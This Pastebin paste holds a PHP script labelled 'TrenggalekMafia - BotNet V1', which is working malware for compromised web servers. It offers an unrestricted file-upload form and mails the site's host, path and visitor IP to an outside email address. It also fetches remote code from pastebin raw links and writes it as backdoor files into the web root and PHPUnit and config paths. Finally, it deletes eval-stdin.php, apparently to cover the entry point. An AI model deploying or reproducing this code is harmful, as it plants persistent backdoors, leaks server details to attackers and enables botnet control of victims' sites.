Advertisement
Guest User

Untitled

a guest
Jul 22nd, 2019
307
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.89 KB | None | 0 0
  1. <html>
  2. TrenggalekMafia - BotNet V1
  3. <title>Up</title>
  4. <form method='post' enctype='multipart/form-data'>
  5. <input type='file' name='idx_file'>
  6. <input type='submit' value='upload' name='upload'>
  7.  
  8. </form>
  9. <?php if(isset($_POST['upload'])) { if(@copy($_FILES['idx_file']['tmp_name'], $_FILES['idx_file']['name'])) { echo$_FILES['idx_file']['name']. '[<b>OK</b>]'; } else { echo$_FILES['idx_file']['name']. '[<b>FAILED</b>'; } }
  10. ?>
  11. <?php
  12. $ip = getenv("REMOTE_ADDR");
  13. $subj98 = " Tuyul |$ip";
  14. $email = "askamu@yandex.com";
  15. $from = "From: Result<Tuyul";
  16. $a45 = $_SERVER['REQUEST_URI'];
  17. $b75 = $_SERVER['HTTP_HOST'];
  18. $m22 = $ip . "";
  19. $msg8873 = "$m22 $b75 $a45";
  20. mail($email, $subj98, $msg8873, $from);
  21. ?>
  22. <?php
  23. function http_get($url){
  24. $im = curl_init($url);
  25. curl_setopt($im, CURLOPT_RETURNTRANSFER, 1);
  26. curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10);
  27. curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1);
  28. curl_setopt($im, CURLOPT_HEADER, 0);
  29. return curl_exec($im);
  30. curl_close($im);
  31. }
  32. $check1 = $_SERVER['DOCUMENT_ROOT'] . "/asw.php" ;
  33. $text1 = http_get('https://pastebin.com/raw/LY6HxEDi');
  34. $open1 = fopen($check1, 'w');
  35. fwrite($open1, $text1);
  36. fclose($open1);
  37. if(file_exists($check1)){
  38. }
  39. $check4 = $_SERVER['DOCUMENT_ROOT'] . "/vendor/phpunit/phpunit/src/web.php" ;
  40. $text4 = http_get('https://pastebin.com/raw/u5vP8PyY');
  41. $open4 = fopen($check4, 'w');
  42. fwrite($open4, $text4);
  43. fclose($open4);
  44. if(file_exists($check4)){
  45. }
  46. $check12 = $_SERVER['DOCUMENT_ROOT'] . "/config/web.php" ;
  47. $text12 = http_get('https://pastebin.com/raw/u5vP8PyY');
  48. $open12 = fopen($check12, 'w');
  49. fwrite($open12, $text12);
  50. fclose($open12);
  51. if(file_exists($check12)){
  52. }
  53. $check2 = $_SERVER['DOCUMENT_ROOT'] . "/pulang.txt" ;
  54. $text2 = http_get('https://pastebin.com/raw/9F1GLW33');
  55. $open2 = fopen($check2, 'w');
  56. fwrite($open2, $text2);
  57. fclose($open2);
  58. if(file_exists($check2)){
  59. }
  60. ?>
  61. <?php
  62. unlink("./eval-stdin.php");
  63. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement